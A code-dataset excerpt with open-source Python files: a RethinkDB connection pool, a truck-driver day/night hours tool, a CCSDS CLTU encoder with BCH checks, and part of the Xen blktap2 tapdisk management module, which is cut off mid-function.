Dataset columns: repo_name (string, length 5-92), path (string, length 4-232), copies (string, 19 classes), size (string, length 4-7), content (string, length 721-1.04M), license (string, 15 classes), hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B), line_mean (float64, 6.51-99.9), line_max (int64, 15-997), alpha_frac (float64, 0.25-0.97), autogenerated (bool, 1 class)

repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---
lucidfrontier45/RethinkPool | rethinkpool/__init__.py | 1 | 2195 | from __future__ import absolute_import
from logging import getLogger
import rethinkdb as r
from future.builtins import range
from future.moves.queue import Queue
logger = getLogger("RethinkPool")
class ConnectionResource(object):
def __init__(self, queue, conn, **kwds):
self._queue = queue
if conn:
self._conn = conn
else:
self._conn = r.connect(**kwds)
@property
def conn(self):
return self._conn
def release(self):
if self._conn:
logger.info("release a connection")
self._queue.put_nowait(self._conn)
self._conn = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.release()
def __del__(self):
self.release()
class RethinkPool(object):
def __init__(self, max_conns=10, initial_conns=0, get_timeout=10, **kwds):
"""
:param max_conns: maximum number of connections
:param initial_conns: number of connections to establish initially
:param get_timeout: timeout for obtaining a connection from the queue
:param host, port, ...: same as r.connect
"""
self._current_conns = 0
self.get_timeout = get_timeout
self._connection_info = kwds
self._queue = Queue(max_conns)
for _ in range(min(initial_conns, max_conns)):
self._queue.put(self._create_connection())
def _create_connection(self):
conn = r.connect(**self._connection_info)
self._current_conns += 1
return conn
@property
def current_conns(self):
return self._current_conns
def get_resource(self):
"""
obtain a connection resource from the queue
:return: ConnectionResource object
"""
if self._queue.empty() and self.current_conns < self._queue.maxsize:
logger.info("create a new connection")
conn = self._create_connection()
else:
logger.info("reuse a connection")
conn = self._queue.get(True, self.get_timeout)
return ConnectionResource(self._queue, conn)
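# Illustrative usage sketch (not part of the library); the host and table
# names below are hypothetical placeholders:
#
#   import rethinkdb as r
#   from rethinkpool import RethinkPool
#
#   pool = RethinkPool(max_conns=10, initial_conns=2, host="localhost")
#   with pool.get_resource() as res:
#       r.table("my_table").run(res.conn)
#   # leaving the "with" block calls release(), which puts the connection
#   # back on the pool's queue for reuse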
| apache-2.0 | 2,460,425,041,709,897,700 | 26.4375 | 78 | 0.596355 | false |
dynamikdev/transportutils | transportutils/driver.py | 1 | 2790 | """
Tools for calculating the hours/periods of a truck driver.
Currently only valid in France.
"""
from datetime import timedelta
from dateutil import rrule
import pytz
# GMT = pytz.timezone('UTC')
# fr = pytz.timezone('Europe/Paris')
ENDNIGHT = 6
STARTNIGHT = 21
class DriverDaysDates(object):
"""
"""
def __init__(self,startOfDay,endOfDay):
self.startOfDay = startOfDay
self.endOfDay = endOfDay
self.daytimedelta = self.nighttimedelta = timedelta()
self.change = list(rrule.rrule(rrule.DAILY,
byhour=(ENDNIGHT,STARTNIGHT),
byminute=0,
bysecond=0,
dtstart=startOfDay,
until=endOfDay))
if len(self.change) == 0:
#there is no day/night transition within the period
if len(list(rrule.rrule(rrule.DAILY,
byhour=0,
byminute=0,
bysecond=0,
dtstart=self.startOfDay,
until=self.endOfDay))) > 0 or self.startOfDay.hour >= STARTNIGHT or self.startOfDay.hour < ENDNIGHT:
#the period crosses midnight or starts at night, so everything is night
self.nighttimedelta = abs(self.endOfDay -self.startOfDay)
self.daytimedelta = timedelta()
else:
#otherwise everything is day
self.nighttimedelta = timedelta()
self.daytimedelta = abs(self.endOfDay -self.startOfDay)
else:
self.calcthedelta()
def calcthedelta(self):
lstdate = [self.startOfDay] + list(self.change) + [self.endOfDay]
# print lstdate
for k in range(1, len(lstdate)):
# print k,lstdate[k-1],lstdate[k]
isNight = False
if lstdate[k-1] in self.change: #start from a change
if lstdate[k-1].hour == STARTNIGHT:
isNight = True
if lstdate[k] in self.change: #end at a change
if lstdate[k].hour == ENDNIGHT:
isNight = True
if isNight:
self.nighttimedelta += abs(lstdate[k] - lstdate[k-1])
else:
self.daytimedelta += abs(lstdate[k] - lstdate[k-1])
class DriverDates(object):
"""
"""
DriverTimeZone = pytz.timezone('Europe/Paris')
def __init__(self, datedeb, datefin):
self.datedeb = datedeb.astimezone(self.DriverTimeZone)
self.datefin = datefin.astimezone(self.DriverTimeZone)
lstdate = [self.datedeb] + \
list(rrule.rrule(rrule.DAILY,
byhour=0,
byminute=0,
bysecond=0,
dtstart=self.datedeb,
until=self.datefin)) +\
[self.datefin]
self.days = [DriverDaysDates(lstdate[k-1], lstdate[k]) for k in range(1, len(lstdate))]
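# Illustrative usage sketch (not part of the module); the datetimes are
# made-up examples:
#
#   from datetime import datetime, timedelta
#   import pytz
#
#   start = pytz.utc.localize(datetime(2015, 3, 2, 19, 0)) # 20:00 in Paris
#   end = pytz.utc.localize(datetime(2015, 3, 3, 1, 0)) # 02:00 in Paris
#   dd = DriverDates(start, end)
#   day = sum((d.daytimedelta for d in dd.days), timedelta())
#   night = sum((d.nighttimedelta for d in dd.days), timedelta())
#   # with STARTNIGHT = 21 this yields 1h of day time (20:00-21:00)
#   # and 5h of night time (21:00-02:00)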
| gpl-2.0 | -3,237,510,786,302,446,000 | 33.02439 | 108 | 0.567384 | false |
Stefan-Korner/SpacePyLibrary | CCSDS/CLTU.py | 1 | 6692 | #******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# CCSDS Stack - CLTU Handling Module *
#******************************************************************************
import array
import UTIL.BCH
#############
# constants #
#############
# CLTU header
CLTU_START_SEQUENCE = [0xEB, 0x90]
CLTU_START_SEQUENCE_SIZE = len(CLTU_START_SEQUENCE)
# fill bytes for last code block
CLTU_FILL_BYTE = 0x55
# compliant with SCOS-2000
CLTU_TRAILER_SEQUENCE = [0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55]
# compliant with CCSDS specification
#CLTU_TRAILER_SEQUENCE = [0xC5, 0xC5, 0xC5, 0xC5, 0xC5, 0xC5, 0xC5, 0x79]
CLTU_TRAILER_SEQUENCE_SIZE = len(CLTU_TRAILER_SEQUENCE)
# derived constants
BCH_NETTO_SIZE = UTIL.BCH.CODE_BLOCK_SIZE - 1
BCH_MAX_NETTO_INDEX = BCH_NETTO_SIZE - 1
#############
# functions #
#############
# -----------------------------------------------------------------------------
def encodeCltu(frame):
"""Converts a TC Frame into a CLTU"""
# iterate over the frame bytes, which are copied
# into the CLTU body together with BCH code bytes
frameIdx = 0
frameSize = len(frame)
nrCltuCodeBlocks = (frameSize + BCH_MAX_NETTO_INDEX) // BCH_NETTO_SIZE
cltuBodySize = nrCltuCodeBlocks * UTIL.BCH.CODE_BLOCK_SIZE
cltuBody = array.array("B", [0] * cltuBodySize)
cltuBodyIdx = 0
codeBlkIdx = 0
while frameIdx < frameSize:
# handle start of a code block
if codeBlkIdx == 0:
sreg = UTIL.BCH.encodeStart()
# take the next byte from the frame for the CLTU and the BCH encoding
nextByte = frame[frameIdx]
cltuBody[cltuBodyIdx] = nextByte
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
frameIdx += 1
cltuBodyIdx += 1
codeBlkIdx += 1
# handle end of a code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
cltuBody[cltuBodyIdx] = code
cltuBodyIdx += 1
codeBlkIdx = 0
# fill up remaining bytes in the cltuBody (incl. BCH code byte)
while cltuBodyIdx < cltuBodySize:
nextByte = CLTU_FILL_BYTE
cltuBody[cltuBodyIdx] = nextByte
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
cltuBodyIdx += 1
codeBlkIdx += 1
# handle end of the code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
cltuBody[cltuBodyIdx] = code
cltuBodyIdx += 1
# CLTU body is completely processed
return (array.array("B", CLTU_START_SEQUENCE) +
cltuBody +
array.array("B", CLTU_TRAILER_SEQUENCE))
# -----------------------------------------------------------------------------
def decodeCltu(cltu):
"""Converts a CLTU into a TC Frame"""
# Note: the returned frame might contain additional fill bytes,
# these bytes must be removed at the frame layer
# calculate the frame size from the CLTU size
cltuSize = len(cltu)
cltuBodySize = cltuSize - CLTU_START_SEQUENCE_SIZE - CLTU_TRAILER_SEQUENCE_SIZE
# check general CLTU properties
if cltuBodySize < 0:
return None
if cltuBodySize % UTIL.BCH.CODE_BLOCK_SIZE != 0:
return None
if cltu[:CLTU_START_SEQUENCE_SIZE] != array.array("B", CLTU_START_SEQUENCE):
return None
if cltu[-CLTU_TRAILER_SEQUENCE_SIZE:] != array.array("B", CLTU_TRAILER_SEQUENCE):
return None
# iterate over the CLTU body bytes, which are copied
# into the frame, BCH code is checked during the iteration
nrCltuCodeBlocks = cltuBodySize // UTIL.BCH.CODE_BLOCK_SIZE
frameSize = nrCltuCodeBlocks * BCH_NETTO_SIZE
frame = array.array("B", [0] * frameSize)
frameIdx = 0
cltuIdx = CLTU_START_SEQUENCE_SIZE
codeBlkIdx = 0
while frameIdx < frameSize:
# handle start of a code block
if codeBlkIdx == 0:
sreg = UTIL.BCH.encodeStart()
# take the next byte from the CLTU for the frame and the BCH decoding
nextByte = cltu[cltuIdx]
frame[frameIdx] = nextByte
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
frameIdx += 1
cltuIdx += 1
codeBlkIdx += 1
# handle end of a code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
if cltu[cltuIdx] != code:
return None
cltuIdx += 1
codeBlkIdx = 0
return frame
# -----------------------------------------------------------------------------
def checkCltu(cltu):
"""Checks the consistency of a CLTU"""
# calculate the frame size from the CLTU size
cltuSize = len(cltu)
cltuTrailerStartIdx = cltuSize - CLTU_TRAILER_SEQUENCE_SIZE
cltuBodySize = cltuTrailerStartIdx - CLTU_START_SEQUENCE_SIZE
# check general CLTU properties
if cltuBodySize < 0:
return False, "cltuBodySize too short"
if cltuBodySize % UTIL.BCH.CODE_BLOCK_SIZE != 0:
return False, "wrong cltuBodySize"
for i in range(0, CLTU_START_SEQUENCE_SIZE):
if cltu[i] != CLTU_START_SEQUENCE[i]:
return False, "wrong cltu start sequence"
for i in range(-CLTU_TRAILER_SEQUENCE_SIZE, 0):
if cltu[i] != CLTU_TRAILER_SEQUENCE[i]:
return False, "wrong cltu trailer sequence"
# iterate over the CLTU body bytes and check the BCH code
nrCltuCodeBlocks = cltuBodySize // UTIL.BCH.CODE_BLOCK_SIZE
frameSize = nrCltuCodeBlocks * BCH_NETTO_SIZE
cltuIdx = CLTU_START_SEQUENCE_SIZE
codeBlkIdx = 0
while cltuIdx < cltuTrailerStartIdx:
# handle start of a code block
if codeBlkIdx == 0:
sreg = UTIL.BCH.encodeStart()
# take the next byte from the CLTU for the frame and the BCH decoding
nextByte = cltu[cltuIdx]
sreg = UTIL.BCH.encodeStep(sreg, nextByte)
cltuIdx += 1
codeBlkIdx += 1
# handle end of a code block
if codeBlkIdx >= BCH_NETTO_SIZE:
code = UTIL.BCH.encodeStop(sreg)
if cltu[cltuIdx] != code:
return False, "wrong BCH check byte"
cltuIdx += 1
codeBlkIdx = 0
return True, "cltu OK"
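# Illustrative round-trip sketch (not part of the module): a TC frame is
# wrapped into a CLTU, verified and recovered again. Note that decodeCltu()
# may return extra 0x55 fill bytes, which the frame layer must strip.
#
#   import array
#   frame = array.array("B", range(100))
#   cltu = encodeCltu(frame)
#   ok, msg = checkCltu(cltu) # expected: (True, "cltu OK")
#   recovered = decodeCltu(cltu)
#   assert recovered[:len(frame)] == frame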
| mit | -4,633,000,611,466,024,000 | 39.313253 | 83 | 0.59997 | false |
chandrikas/sm | drivers/blktap2.py | 1 | 90416 | #!/usr/bin/env python
#
# Copyright (C) Citrix Systems Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; version 2.1 only.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# blktap2: blktap/tapdisk management layer
#
import os
import sys
import re
import time
import copy
from lock import Lock
import util
import xmlrpclib
import httplib
import errno
import subprocess
import syslog as _syslog
import glob
import json
import xs_errors
import XenAPI
import scsiutil
from syslog import openlog, syslog
from stat import * # S_ISBLK(), ...
import nfs
import resetvdis
import vhdutil
import lvhdutil
# For RRDD Plugin Registration
from xmlrpclib import ServerProxy, Transport
from socket import socket, AF_UNIX, SOCK_STREAM
from httplib import HTTP, HTTPConnection
PLUGIN_TAP_PAUSE = "tapdisk-pause"
SOCKPATH = "/var/xapi/xcp-rrdd"
NUM_PAGES_PER_RING = 32 * 11
MAX_FULL_RINGS = 8
POOL_NAME_KEY = "mem-pool"
POOL_SIZE_KEY = "mem-pool-size-rings"
ENABLE_MULTIPLE_ATTACH = "/etc/xensource/allow_multiple_vdi_attach"
NO_MULTIPLE_ATTACH = not (os.path.exists(ENABLE_MULTIPLE_ATTACH))
class UnixStreamHTTPConnection(HTTPConnection):
def connect(self):
self.sock = socket(AF_UNIX, SOCK_STREAM)
self.sock.connect(SOCKPATH)
class UnixStreamHTTP(HTTP):
_connection_class = UnixStreamHTTPConnection
class UnixStreamTransport(Transport):
def make_connection(self, host):
return UnixStreamHTTP(SOCKPATH) # overridden, but prevents IndexError
def locking(excType, override=True):
def locking2(op):
def wrapper(self, *args):
self.lock.acquire()
try:
try:
ret = op(self, *args)
except (util.CommandException, util.SMException, XenAPI.Failure), e:
util.logException("BLKTAP2:%s" % op)
msg = str(e)
if isinstance(e, util.CommandException):
msg = "Command %s failed (%s): %s" % \
(e.cmd, e.code, e.reason)
if override:
raise xs_errors.XenError(excType, opterr=msg)
else:
raise
except:
util.logException("BLKTAP2:%s" % op)
raise
finally:
self.lock.release()
return ret
return wrapper
return locking2
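# Usage note: further down in this file VDI._activate_locked() and
# VDI._deactivate_locked() are wrapped as, e.g.:
#
# @locking("VDIUnavailable")
# def _activate_locked(self, sr_uuid, vdi_uuid, options):
# ...
#
# i.e. the method body runs under self.lock and any failure is logged and
# re-raised as the given XenError type.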
class RetryLoop(object):
def __init__(self, backoff, limit):
self.backoff = backoff
self.limit = limit
def __call__(self, f):
def loop(*__t, **__d):
attempt = 0
while True:
attempt += 1
try:
return f(*__t, **__d)
except self.TransientFailure, e:
e = e.exception
if attempt >= self.limit: raise e
time.sleep(self.backoff)
return loop
class TransientFailure(Exception):
def __init__(self, exception):
self.exception = exception
def retried(**args): return RetryLoop(**args)
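# Sketch of the retry semantics defined above, using a hypothetical
# flaky_call() for illustration: the call is retried every `backoff` seconds
# while it raises RetryLoop.TransientFailure, and the wrapped exception is
# re-raised after `limit` attempts. TapCtl.list() and TapCtl.spawn() below
# use this pattern.
#
#   @retried(backoff=.5, limit=10)
#   def flaky_call():
#       try:
#           return do_something() # hypothetical
#       except EnvironmentError, e:
#           raise RetryLoop.TransientFailure(e)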
class TapCtl(object):
"""Tapdisk IPC utility calls."""
PATH = "/usr/sbin/tap-ctl"
def __init__(self, cmd, p):
self.cmd = cmd
self._p = p
self.stdout = p.stdout
class CommandFailure(Exception):
"""TapCtl cmd failure."""
def __init__(self, cmd, **info):
self.cmd = cmd
self.info = info
def __str__(self):
items = self.info.iteritems()
info = ", ".join("%s=%s" % item
for item in items)
return "%s failed: %s" % (self.cmd, info)
# Trying to get a non-existent attribute throws an AttributeError
# exception
def __getattr__(self, key):
if self.info.has_key(key): return self.info[key]
return object.__getattribute__(self, key)
# Retrieves the error code returned by the command. If the error code
# was not supplied at object-construction time, zero is returned.
def get_error_code(self):
key = 'status'
if self.info.has_key(key):
return self.info[key]
else:
return 0
@classmethod
def __mkcmd_real(cls, args):
return [ cls.PATH ] + map(str, args)
__next_mkcmd = __mkcmd_real
@classmethod
def _mkcmd(cls, args):
__next_mkcmd = cls.__next_mkcmd
cls.__next_mkcmd = cls.__mkcmd_real
return __next_mkcmd(args)
@classmethod
def failwith(cls, status, prev=False):
"""
Fail next invocation with @status. If @prev is true, execute
the original command
"""
__prev_mkcmd = cls.__next_mkcmd
@classmethod
def __mkcmd(cls, args):
if prev:
cmd = __prev_mkcmd(args)
cmd = "'%s' && exit %d" % ("' '".join(cmd), status)
else:
cmd = "exit %d" % status
return [ '/bin/sh', '-c', cmd ]
cls.__next_mkcmd = __mkcmd
__strace_n = 0
@classmethod
def strace(cls):
"""
Run next invocation through strace.
Output goes to /tmp/tap-ctl.<sm-pid>.<n>; <n> counts invocations.
"""
__prev_mkcmd = cls.__next_mkcmd
@classmethod
def __next_mkcmd(cls, args):
# pylint: disable = E1101
cmd = __prev_mkcmd(args)
tracefile = "/tmp/%s.%d.%d" % (os.path.basename(cls.PATH),
os.getpid(),
cls.__strace_n)
cls.__strace_n += 1
return \
[ '/usr/bin/strace', '-o', tracefile, '--'] + cmd
cls.__next_mkcmd = __next_mkcmd
@classmethod
def _call(cls, args, quiet = False, input = None):
"""
Spawn a tap-ctl process. Return a TapCtl invocation.
Raises a TapCtl.CommandFailure if subprocess creation failed.
"""
cmd = cls._mkcmd(args)
if not quiet:
util.SMlog(cmd)
try:
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if input:
p.stdin.write(input)
p.stdin.close()
except OSError, e:
raise cls.CommandFailure(cmd, errno=e.errno)
return cls(cmd, p)
def _errmsg(self):
output = map(str.rstrip, self._p.stderr)
return "; ".join(output)
def _wait(self, quiet = False):
"""
Reap the child tap-ctl process of this invocation.
Raises a TapCtl.CommandFailure on non-zero exit status.
"""
status = self._p.wait()
if not quiet:
util.SMlog(" = %d" % status)
if status == 0: return
info = { 'errmsg' : self._errmsg(),
'pid' : self._p.pid }
if status < 0:
info['signal'] = -status
else:
info['status'] = status
raise self.CommandFailure(self.cmd, **info)
@classmethod
def _pread(cls, args, quiet = False, input = None):
"""
Spawn a tap-ctl invocation and read a single line.
"""
tapctl = cls._call(args=args, quiet=quiet, input=input)
output = tapctl.stdout.readline().rstrip()
tapctl._wait(quiet)
return output
@staticmethod
def _maybe(opt, parm):
if parm is not None: return [ opt, parm ]
return []
@classmethod
def __list(cls, minor = None, pid = None, _type = None, path = None):
args = [ "list" ]
args += cls._maybe("-m", minor)
args += cls._maybe("-p", pid)
args += cls._maybe("-t", _type)
args += cls._maybe("-f", path)
tapctl = cls._call(args, True)
for line in tapctl.stdout:
# FIXME: tap-ctl writes error messages to stdout and
# confuses this parser
if line == "blktap kernel module not installed\n":
# This isn't pretty but (a) neither is confusing stdout/stderr
# and at least causes the error to describe the fix
raise Exception, "blktap kernel module not installed: try 'modprobe blktap'"
row = {}
for field in line.rstrip().split(' ', 3):
bits = field.split('=')
if len(bits) == 2:
key, val = field.split('=')
if key in ('pid', 'minor'):
row[key] = int(val, 10)
elif key in ('state'):
row[key] = int(val, 0x10)
else:
row[key] = val
else:
util.SMlog("Ignoring unexpected tap-ctl output: %s" % repr(field))
yield row
tapctl._wait(True)
@classmethod
@retried(backoff=.5, limit=10)
def list(cls, **args):
# FIXME. We typically get an EPROTO when uevents interleave
# with SM ops and a tapdisk shuts down under our feet. Should
# be fixed in SM.
try:
return list(cls.__list(**args))
except cls.CommandFailure, e:
transient = [ errno.EPROTO, errno.ENOENT ]
if e.status in transient:
raise RetryLoop.TransientFailure(e)
raise
@classmethod
def allocate(cls, devpath = None):
args = [ "allocate" ]
args += cls._maybe("-d", devpath)
return cls._pread(args)
@classmethod
def free(cls, minor):
args = [ "free", "-m", minor ]
cls._pread(args)
@classmethod
@retried(backoff=.5, limit=10)
def spawn(cls):
args = [ "spawn" ]
try:
pid = cls._pread(args)
return int(pid)
except cls.CommandFailure as ce:
# intermittent failures to spawn. CA-292268
if ce.status == 1:
raise RetryLoop.TransientFailure(ce)
raise
@classmethod
def attach(cls, pid, minor):
args = [ "attach", "-p", pid, "-m", minor ]
cls._pread(args)
@classmethod
def detach(cls, pid, minor):
args = [ "detach", "-p", pid, "-m", minor ]
cls._pread(args)
@classmethod
def open(cls, pid, minor, _type, _file, options):
params = Tapdisk.Arg(_type, _file)
args = [ "open", "-p", pid, "-m", minor, '-a', str(params) ]
input = None
if options.get("rdonly"):
args.append('-R')
if options.get("lcache"):
args.append("-r")
if options.get("existing_prt") != None:
args.append("-e")
args.append(str(options["existing_prt"]))
if options.get("secondary"):
args.append("-2")
args.append(options["secondary"])
if options.get("standby"):
args.append("-s")
if options.get("timeout"):
args.append("-t")
args.append(str(options["timeout"]))
if not options.get("o_direct", True):
args.append("-D")
if options.get('cbtlog'):
args.extend(['-C', options['cbtlog']])
if options.get('key_hash'):
import plugins
key_hash = options['key_hash']
vdi_uuid = options['vdi_uuid']
key = plugins.load_key(key_hash, vdi_uuid)
if not key:
raise util.SMException("No key found with key hash {}".format(key_hash))
input = key
args.append('-E')
cls._pread(args=args, input=input)
@classmethod
def close(cls, pid, minor, force = False):
args = [ "close", "-p", pid, "-m", minor ]
if force: args += [ "-f" ]
cls._pread(args)
@classmethod
def pause(cls, pid, minor):
args = [ "pause", "-p", pid, "-m", minor ]
cls._pread(args)
@classmethod
def unpause(cls, pid, minor, _type = None, _file = None, mirror = None,
cbtlog = None):
args = [ "unpause", "-p", pid, "-m", minor ]
if mirror:
args.extend(["-2", mirror])
if _type and _file:
params = Tapdisk.Arg(_type, _file)
args += [ "-a", str(params) ]
if cbtlog:
args.extend(["-c", cbtlog])
cls._pread(args)
@classmethod
def stats(cls, pid, minor):
args = [ "stats", "-p", pid, "-m", minor ]
return cls._pread(args, quiet = True)
@classmethod
def major(cls):
args = [ "major" ]
major = cls._pread(args)
return int(major)
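# For illustration, the low-level tap-ctl call sequence wrapped by the class
# above looks roughly as follows (normally driven by the Tapdisk class below
# rather than called directly; the VHD path is a made-up example):
#
#   minor = Tapdisk._parse_minor(TapCtl.allocate())
#   pid = TapCtl.spawn()
#   TapCtl.attach(pid, minor)
#   TapCtl.open(pid, minor, 'vhd', '/path/to/disk.vhd', {"rdonly": False})
#   # ... I/O happens via /dev/xen/blktap-2/tapdev<minor> ...
#   TapCtl.close(pid, minor)
#   TapCtl.detach(pid, minor)
#   TapCtl.free(minor)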
class TapdiskExists(Exception):
"""Tapdisk already running."""
def __init__(self, tapdisk):
self.tapdisk = tapdisk
def __str__(self):
return "%s already running" % self.tapdisk
class TapdiskNotRunning(Exception):
"""No such Tapdisk."""
def __init__(self, **attrs):
self.attrs = attrs
def __str__(self):
items = self.attrs.iteritems()
attrs = ", ".join("%s=%s" % attr
for attr in items)
return "No such Tapdisk(%s)" % attrs
class TapdiskNotUnique(Exception):
"""More than one tapdisk on one path."""
def __init__(self, tapdisks):
self.tapdisks = tapdisks
def __str__(self):
tapdisks = map(str, self.tapdisks)
return "Found multiple tapdisks: %s" % tapdisks
class TapdiskFailed(Exception):
"""Tapdisk launch failure."""
def __init__(self, arg, err):
self.arg = arg
self.err = err
def __str__(self):
return "Tapdisk(%s): %s" % (self.arg, self.err)
def get_error(self):
return self.err
class TapdiskInvalidState(Exception):
"""Tapdisk pause/unpause failure"""
def __init__(self, tapdisk):
self.tapdisk = tapdisk
def __str__(self):
return str(self.tapdisk)
def mkdirs(path, mode=0777):
if not os.path.exists(path):
parent, subdir = os.path.split(path)
assert parent != path
try:
if parent:
mkdirs(parent, mode)
if subdir:
os.mkdir(path, mode)
except OSError, e:
if e.errno != errno.EEXIST:
raise
class KObject(object):
SYSFS_CLASSTYPE = None
def sysfs_devname(self):
raise NotImplementedError("sysfs_devname is undefined")
class Attribute(object):
SYSFS_NODENAME = None
def __init__(self, path):
self.path = path
@classmethod
def from_kobject(cls, kobj):
path = "%s/%s" % (kobj.sysfs_path(), cls.SYSFS_NODENAME)
return cls(path)
class NoSuchAttribute(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return "No such attribute: %s" % self.name
def _open(self, mode='r'):
try:
return file(self.path, mode)
except IOError, e:
if e.errno == errno.ENOENT:
raise self.NoSuchAttribute(self)
raise
def readline(self):
f = self._open('r')
s = f.readline().rstrip()
f.close()
return s
def writeline(self, val):
f = self._open('w')
f.write(val)
f.close()
class ClassDevice(KObject):
@classmethod
def sysfs_class_path(cls):
return "/sys/class/%s" % cls.SYSFS_CLASSTYPE
def sysfs_path(self):
return "%s/%s" % (self.sysfs_class_path(),
self.sysfs_devname())
class Blktap(ClassDevice):
DEV_BASEDIR = '/dev/xen/blktap-2'
SYSFS_CLASSTYPE = "blktap2"
def __init__(self, minor):
self.minor = minor
self._pool = None
self._task = None
@classmethod
def allocate(cls):
# FIXME. Should rather go into init.
mkdirs(cls.DEV_BASEDIR)
devname = TapCtl.allocate()
minor = Tapdisk._parse_minor(devname)
return cls(minor)
def free(self):
TapCtl.free(self.minor)
def __str__(self):
return "%s(minor=%d)" % (self.__class__.__name__, self.minor)
def sysfs_devname(self):
return "blktap!blktap%d" % self.minor
class Pool(Attribute):
SYSFS_NODENAME = "pool"
def get_pool_attr(self):
if not self._pool:
self._pool = self.Pool.from_kobject(self)
return self._pool
def get_pool_name(self):
return self.get_pool_attr().readline()
def set_pool_name(self, name):
self.get_pool_attr().writeline(name)
def set_pool_size(self, pages):
self.get_pool().set_size(pages)
def get_pool(self):
return BlktapControl.get_pool(self.get_pool_name())
def set_pool(self, pool):
self.set_pool_name(pool.name)
class Task(Attribute):
SYSFS_NODENAME = "task"
def get_task_attr(self):
if not self._task:
self._task = self.Task.from_kobject(self)
return self._task
def get_task_pid(self):
pid = self.get_task_attr().readline()
try:
return int(pid)
except ValueError:
return None
def find_tapdisk(self):
pid = self.get_task_pid()
if pid is None: return None
return Tapdisk.find(pid=pid, minor=self.minor)
def get_tapdisk(self):
tapdisk = self.find_tapdisk()
if not tapdisk:
raise TapdiskNotRunning(minor=self.minor)
return tapdisk
class Tapdisk(object):
TYPES = [ 'aio', 'vhd' ]
def __init__(self, pid, minor, _type, path, state):
self.pid = pid
self.minor = minor
self.type = _type
self.path = path
self.state = state
self._dirty = False
self._blktap = None
def __str__(self):
state = self.pause_state()
return "Tapdisk(%s, pid=%d, minor=%s, state=%s)" % \
(self.get_arg(), self.pid, self.minor, state)
@classmethod
def list(cls, **args):
for row in TapCtl.list(**args):
args = { 'pid' : None,
'minor' : None,
'state' : None,
'_type' : None,
'path' : None }
for key, val in row.iteritems():
if key in args:
args[key] = val
if 'args' in row:
image = Tapdisk.Arg.parse(row['args'])
args['_type'] = image.type
args['path'] = image.path
if None in args.values():
continue
yield Tapdisk(**args)
@classmethod
def find(cls, **args):
found = list(cls.list(**args))
if len(found) > 1:
raise TapdiskNotUnique(found)
if found:
return found[0]
return None
@classmethod
def find_by_path(cls, path):
return cls.find(path=path)
@classmethod
def find_by_minor(cls, minor):
return cls.find(minor=minor)
@classmethod
def get(cls, **attrs):
tapdisk = cls.find(**attrs)
if not tapdisk:
raise TapdiskNotRunning(**attrs)
return tapdisk
@classmethod
def from_path(cls, path):
return cls.get(path=path)
@classmethod
def from_minor(cls, minor):
return cls.get(minor=minor)
@classmethod
def __from_blktap(cls, blktap):
tapdisk = cls.from_minor(minor=blktap.minor)
tapdisk._blktap = blktap
return tapdisk
def get_blktap(self):
if not self._blktap:
self._blktap = Blktap(self.minor)
return self._blktap
class Arg:
def __init__(self, _type, path):
self.type = _type
self.path = path
def __str__(self):
return "%s:%s" % (self.type, self.path)
@classmethod
def parse(cls, arg):
try:
_type, path = arg.split(":", 1)
except ValueError:
raise cls.InvalidArgument(arg)
if _type not in Tapdisk.TYPES:
raise cls.InvalidType(_type)
return cls(_type, path)
class InvalidType(Exception):
def __init__(self, _type):
self.type = _type
def __str__(self):
return "Not a Tapdisk type: %s" % self.type
class InvalidArgument(Exception):
def __init__(self, arg):
self.arg = arg
def __str__(self):
return "Not a Tapdisk image: %s" % self.arg
def get_arg(self):
return self.Arg(self.type, self.path)
def get_devpath(self):
return "%s/tapdev%d" % (Blktap.DEV_BASEDIR, self.minor)
@classmethod
def launch_from_arg(cls, arg):
arg = cls.Arg.parse(arg)
return cls.launch(arg.path, arg.type, False)
@classmethod
def launch_on_tap(cls, blktap, path, _type, options):
tapdisk = cls.find_by_path(path)
if tapdisk:
raise TapdiskExists(tapdisk)
minor = blktap.minor
try:
pid = TapCtl.spawn()
try:
TapCtl.attach(pid, minor)
try:
TapCtl.open(pid, minor, _type, path, options)
try:
tapdisk = cls.__from_blktap(blktap)
node = '/sys/dev/block/%d:%d' % (tapdisk.major(), tapdisk.minor)
util.set_scheduler_sysfs_node(node, 'noop')
return tapdisk
except:
TapCtl.close(pid, minor)
raise
except:
TapCtl.detach(pid, minor)
raise
except:
exc_info = sys.exc_info()
# FIXME: Should be tap-ctl shutdown.
try:
import signal
os.kill(pid, signal.SIGTERM)
os.waitpid(pid, 0)
finally:
raise exc_info[0], exc_info[1], exc_info[2]
except TapCtl.CommandFailure, ctl:
util.logException(ctl)
if ('/dev/xapi/cd/' in path and
'status' in ctl.info and
ctl.info['status'] == 123): # ENOMEDIUM (No medium found)
raise xs_errors.XenError('TapdiskDriveEmpty')
else:
raise TapdiskFailed(cls.Arg(_type, path), ctl)
@classmethod
def launch(cls, path, _type, rdonly):
blktap = Blktap.allocate()
try:
